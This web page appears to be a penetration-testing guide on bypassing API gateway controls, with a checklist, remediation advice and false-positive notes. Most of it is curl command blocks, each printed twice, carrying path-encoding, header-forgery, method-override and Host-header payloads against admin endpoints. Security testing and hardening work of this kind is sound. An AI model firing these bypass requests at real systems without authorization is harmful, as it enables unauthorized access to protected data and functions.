Exploitation A05| Security Misconfiguration A01| Broken Access Control
API Gateway Bypass
API gateways and reverse proxies (Nginx, Kong, Envoy, AWS API Gateway) enforce authentication, rate limiting, and routing. Misconfigurations in path normalization, header handling, and routing rules allow attackers to bypass these controls and access unprotected backend APIs directly.
Path Traversal & Normalization
bash
# API gateway blocks /admin/* but can be bypassed with path confusion:
# Double encoding:
curl -s https://target.com/api/..%252f..%252fadmin/users
# Path normalization differences:
curl -s https://target.com/api/./admin/users
curl -s https://target.com/api/admin/../admin/users
curl -s https://target.com/api/%2e%2e/admin/users
curl -s https://target.com/api/..;/admin/users # Tomcat/Spring
curl -s https://target.com/api/admin/users;.json # Semicolon injection
# Trailing characters:
curl -s https://target.com/admin/users/
curl -s https://target.com/admin/users%20
curl -s https://target.com/admin/users%00
curl -s https://target.com/admin/users..json
# Case sensitivity (gateway case-sensitive, backend isn't):
curl -s https://target.com/Admin/users
curl -s https://target.com/ADMIN/users
curl -s https://target.com/aDmIn/users
# HTTP method override:
curl -s -X GET https://target.com/api/admin/users \
-H 'X-HTTP-Method-Override: DELETE'
curl -s -X POST https://target.com/api/admin/users \
-H 'X-HTTP-Method: PUT'# API gateway blocks /admin/* but can be bypassed with path confusion:
# Double encoding:
curl -s https://target.com/api/..%252f..%252fadmin/users
# Path normalization differences:
curl -s https://target.com/api/./admin/users
curl -s https://target.com/api/admin/../admin/users
curl -s https://target.com/api/%2e%2e/admin/users
curl -s https://target.com/api/..;/admin/users # Tomcat/Spring
curl -s https://target.com/api/admin/users;.json # Semicolon injection
# Trailing characters:
curl -s https://target.com/admin/users/
curl -s https://target.com/admin/users%20
curl -s https://target.com/admin/users%00
curl -s https://target.com/admin/users..json
# Case sensitivity (gateway case-sensitive, backend isn't):
curl -s https://target.com/Admin/users
curl -s https://target.com/ADMIN/users
curl -s https://target.com/aDmIn/users
# HTTP method override:
curl -s -X GET https://target.com/api/admin/users \
-H 'X-HTTP-Method-Override: DELETE'
curl -s -X POST https://target.com/api/admin/users \
-H 'X-HTTP-Method: PUT'Direct Backend Access
bash
# Discover backend servers bypassing the gateway:
# Check for internal headers revealing backend info:
curl -sI https://target.com/api/users | grep -iE 'x-backend|x-served|x-upstream|via|x-real'
# Try accessing backend ports directly:
# If you discover internal IPs from headers or SSRF:
curl -s http://10.0.1.50:8080/api/users # No auth required!
# Exploit API version routing gaps:
# Gateway protects /api/v2/* but not /api/v1/*:
curl -s https://target.com/api/v1/admin/users -H 'Authorization: Bearer REGULAR_TOKEN'
# Test unregistered paths:
# Gateway only routes known paths — try undocumented ones:
curl -s https://target.com/api/internal/config
curl -s https://target.com/api/debug
curl -s https://target.com/api/health
curl -s https://target.com/api/metrics
curl -s https://target.com/api/graphql # GraphQL may bypass REST gateway rules# Discover backend servers bypassing the gateway:
# Check for internal headers revealing backend info:
curl -sI https://target.com/api/users | grep -iE 'x-backend|x-served|x-upstream|via|x-real'
# Try accessing backend ports directly:
# If you discover internal IPs from headers or SSRF:
curl -s http://10.0.1.50:8080/api/users # No auth required!
# Exploit API version routing gaps:
# Gateway protects /api/v2/* but not /api/v1/*:
curl -s https://target.com/api/v1/admin/users -H 'Authorization: Bearer REGULAR_TOKEN'
# Test unregistered paths:
# Gateway only routes known paths — try undocumented ones:
curl -s https://target.com/api/internal/config
curl -s https://target.com/api/debug
curl -s https://target.com/api/health
curl -s https://target.com/api/metrics
curl -s https://target.com/api/graphql # GraphQL may bypass REST gateway rulesHeader Manipulation
bash
# Bypass authentication at the gateway level:
# Internal trust headers (gateway adds these for backend):
curl -s https://target.com/api/admin/users \
-H 'X-Forwarded-User: admin'
curl -s https://target.com/api/admin/users \
-H 'X-User-Id: 1' \
-H 'X-User-Role: admin'
# If the backend trusts headers added by the gateway:
curl -s https://target.com/api/users \
-H 'X-Internal-Auth: true'
# Host header routing bypass:
curl -s https://target.com/api/admin/ \
-H 'Host: internal-admin.target.local'
# Protocol downgrade:
curl -s http://target.com/api/admin/users # HTTP might skip gateway
# Content-Type confusion:
curl -s https://target.com/api/users \
-H 'Content-Type: application/xml' \
-d '<user><role>admin</role></user>'
# Gateway validates JSON but backend also accepts XML# Bypass authentication at the gateway level:
# Internal trust headers (gateway adds these for backend):
curl -s https://target.com/api/admin/users \
-H 'X-Forwarded-User: admin'
curl -s https://target.com/api/admin/users \
-H 'X-User-Id: 1' \
-H 'X-User-Role: admin'
# If the backend trusts headers added by the gateway:
curl -s https://target.com/api/users \
-H 'X-Internal-Auth: true'
# Host header routing bypass:
curl -s https://target.com/api/admin/ \
-H 'Host: internal-admin.target.local'
# Protocol downgrade:
curl -s http://target.com/api/admin/users # HTTP might skip gateway
# Content-Type confusion:
curl -s https://target.com/api/users \
-H 'Content-Type: application/xml' \
-d '<user><role>admin</role></user>'
# Gateway validates JSON but backend also accepts XMLTesting Checklist
- 1. Identify the gateway/proxy technology from response headers
- 2. Test path normalization bypass (encoding, traversal, case, trailing chars)
- 3. Test direct backend access via discovered internal IPs
- 4. Test internal trust headers (X-Forwarded-User, X-User-Role)
- 5. Test old API versions that may bypass new gateway rules
- 6. Test HTTP method override headers
- 7. Test hostname-based routing bypass via Host header
Evidence Collection
Bypass Request: HTTP request that circumvents the gateway's protection
Comparison: Side-by-side of blocked request vs bypassed request
CVSS Range: Auth bypass: 8.1–9.8 | Rate limit bypass: 5.3–7.5
Remediation
- Normalize paths: Ensure the gateway normalizes all paths before matching routing rules.
- Backend auth: Never rely solely on gateway auth — implement authentication at the backend service level too.
- Strip trust headers: Gateway must strip internal headers (X-User-Id, X-Internal-Auth) from external requests.
- Network segmentation: Backend services should only accept connections from the gateway, not from the internet.
False Positive Identification
- Direct backend access by design: Some architectures intentionally expose backends alongside the gateway — verify with the client whether direct access is intended.
- Rate limit reset on gateway restart: Rate limits resetting during deployments may be a known limitation, not a bypass — test during steady state.
- Different response ≠ bypass: Getting a different error from the gateway vs. backend doesn't mean auth was bypassed — confirm you accessed protected resources.